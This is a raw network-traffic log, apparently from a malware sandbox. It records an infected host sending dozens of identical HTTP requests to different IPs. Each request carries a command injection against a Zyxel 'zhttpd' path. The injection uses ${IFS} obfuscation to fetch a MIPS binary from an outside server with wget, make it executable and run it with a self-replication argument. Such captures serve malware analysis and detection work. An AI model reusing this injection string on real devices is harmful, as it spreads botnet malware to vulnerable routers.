                                          Jan 14, 2024 15:46:04.768788099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1628192.168.2.234543866.59.247.229443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.768870115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1629192.168.2.2360280126.131.246.95443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.768870115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1630192.168.2.233426866.213.6.105443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.768918037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1631192.168.2.2357488203.242.28.226443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.768956900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1632192.168.2.235315853.167.157.225443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.768979073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1633192.168.2.2334252189.172.29.100443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.769013882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1634192.168.2.234067824.48.89.197443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.769072056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1635192.168.2.2360690132.98.228.127443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.769104004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1636192.168.2.2360604134.225.110.195443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.769120932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1637192.168.2.2351290131.50.18.121443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.769155025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1638192.168.2.2360916152.193.58.102443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.769191027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1639192.168.2.2342922198.254.6.91443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.769220114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1640192.168.2.234652425.61.80.126443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.769273043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1641192.168.2.2348746213.85.242.127443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.769294024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1642192.168.2.2360910203.81.191.218443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.769310951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1643192.168.2.2337680178.54.77.87443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.769349098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1644192.168.2.234222438.241.231.242443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.769413948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1645192.168.2.2339290139.246.133.146443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.769445896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1646192.168.2.2343540125.114.140.225443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.769452095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1647192.168.2.2336490196.216.122.140443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.769496918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1648192.168.2.234557896.7.44.180443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.769551039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1649192.168.2.2359736144.56.43.91443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.769568920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1650192.168.2.2344882210.141.205.194443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.769593954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1651192.168.2.2352144175.163.55.178443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.769673109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1652192.168.2.2341022208.59.221.220443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.769700050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1653192.168.2.2346998198.103.39.14443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.769762039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1654192.168.2.2335130133.102.165.142443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.769793987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1655192.168.2.233667652.154.42.174443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.769823074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1656192.168.2.235232040.102.231.4443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.769865036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1657192.168.2.2360314123.102.205.144443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.769922018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1658192.168.2.234014665.39.50.109443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.769925117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1659192.168.2.2355264184.152.83.197443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.769977093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1660192.168.2.2352178153.120.154.205443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.770026922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1661192.168.2.2357636219.31.38.1443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.770035028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1662192.168.2.234055276.52.211.24443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.770044088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1663192.168.2.2342584220.89.167.114443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.770067930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1664192.168.2.23508569.140.49.195443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.770098925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1665192.168.2.233303499.196.28.11443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.770154953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1666192.168.2.2341552187.77.55.11443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.770185947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1667192.168.2.2351606124.212.215.204443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.770219088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1668192.168.2.2333214120.141.162.31443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.770267010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1669192.168.2.2358556216.232.112.138443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.770270109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1670192.168.2.235930292.104.157.45443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.770319939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1671192.168.2.2358068121.156.112.101443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.770332098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1672192.168.2.2333564223.197.28.36443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.770421028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1673192.168.2.235159025.37.107.185443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.770421028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1674192.168.2.233500067.82.244.9443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.770452023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1675192.168.2.236049412.189.178.242443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.770472050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1676192.168.2.2354410163.75.94.65443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.770701885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1677192.168.2.234580231.204.61.164443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.770721912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1678192.168.2.233308839.3.149.131443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.770749092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1679192.168.2.235700819.174.218.175443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.770767927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1680192.168.2.235731042.236.190.247443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.770813942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1681192.168.2.23366088.156.190.253443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.770838976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1682192.168.2.2340644130.134.251.201443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.770843983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1683192.168.2.2350328168.54.86.86443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.770879984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1684192.168.2.233440480.3.58.134443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.770917892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1685192.168.2.2347426136.248.241.95443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.770961046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1686192.168.2.2334540110.115.180.28443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.770962954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1687192.168.2.23457965.184.136.28443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.770988941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1688192.168.2.2347654185.186.43.176443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.771006107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1689192.168.2.2356594114.188.77.188443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.771071911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1690192.168.2.235167427.78.105.195443
                                          TimestampBytes transferredDirectionData
